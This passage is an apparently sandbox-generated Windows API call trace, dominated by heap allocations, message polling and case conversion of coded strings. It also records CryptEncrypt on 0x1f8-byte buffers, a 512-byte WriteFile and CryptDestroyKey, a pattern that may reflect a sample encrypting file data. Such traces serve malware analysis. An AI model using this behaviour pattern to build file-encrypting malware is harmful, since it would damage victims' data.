hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.678] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0205.678] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0205.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0205.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0205.679] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaacf0 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.679] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.679] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.680] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.680] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0205.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0205.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a758d0 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0205.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0205.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0205.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaf78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.715] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.715] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.715] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a758d0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x2a758d0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.716] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.716] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.716] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.716] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.716] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.716] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.716] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.716] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.717] WriteFile (in: hFile=0x4ac, lpBuffer=0x2a754d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a754d0*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0205.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.718] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0205.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.718] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0205.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.718] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.718] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.718] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.718] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.718] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaabe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", 